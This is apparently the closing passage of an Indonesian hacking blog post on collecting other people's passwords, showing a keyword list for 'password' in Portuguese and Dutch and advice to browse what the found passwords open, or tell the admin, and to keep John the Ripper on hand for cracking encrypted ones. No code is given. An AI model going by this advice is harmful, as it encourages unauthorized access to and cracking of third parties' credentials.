Portuguese |password | senha
Dutch |password | Paswoord
—————————————————–
setelah temen2 banyak mendapatkan password, apa yang akan anda lakukan?jangan berbuat jahat yang pasti, lihat2 saja isinya atau anda terlalu baik dengan memberitahu admin. jangan lupa sediakan john the ripper dirumah, sapa tau password yang disimpan sudah dalam keadaan terenkripsi.
keterangan :
karena ketidak teraturan kata2 pada artikel ini, setelah tanda “|” berarti itu merupakan keterangan dari kata kunci. MOHON MAAF!!!
Posted by M. Thoyib HM at 6:51 PM 0 comments
View my complete profile